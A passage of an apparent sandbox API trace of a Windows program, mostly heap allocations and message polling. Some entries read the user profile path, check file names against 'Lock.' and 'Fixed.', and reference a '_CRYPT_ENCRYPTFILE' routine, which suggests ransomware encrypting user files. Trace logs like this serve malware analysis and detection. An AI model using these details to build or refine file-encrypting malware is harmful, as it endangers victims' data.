wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0267.187] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.187] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0267.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0267.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0267.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0267.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0267.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0267.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0267.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0267.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R8WIHAk.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8WIHAk.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIHAk.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IHAk.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HAk.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ak.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0267.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0267.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0267.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0267.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0267.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0267.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0267.188] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0267.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0267.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0267.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0267.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0267.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0267.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0267.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0267.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0267.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0267.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0267.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0267.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0267.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0267.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0267.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0267.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R8WIHAk.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8WIHAk.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIHAk.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IHAk.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HAk.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ak.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0267.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0267.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0267.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0267.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0267.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0267.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0267.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0267.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0267.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0267.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0267.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0267.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0267.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0267.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.190] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0267.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0267.190] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0267.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0267.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0267.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0267.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0267.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0267.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0267.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0267.190] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0267.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0267.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0267.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0267.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0267.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0267.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0267.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0267.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0267.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0267.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0267.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0267.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0267.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0267.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0267.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0267.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0267.191] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0267.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0267.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0267.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0267.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0267.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0267.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0267.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0267.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0267.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0267.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517f0 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0267.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0267.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0267.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0267.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0267.193] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0267.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0267.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0267.193] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.193] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0267.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0267.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0267.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0267.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0267.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.194] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0267.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0267.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0267.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0267.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0267.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0267.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0267.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0267.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.194] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0267.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0267.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0267.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0267.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0267.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0267.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0267.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0267.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0267.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0267.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0267.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0267.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0267.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0267.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0267.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0267.195] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0267.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0267.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0267.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0267.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0267.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.196] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0267.196] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.196] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 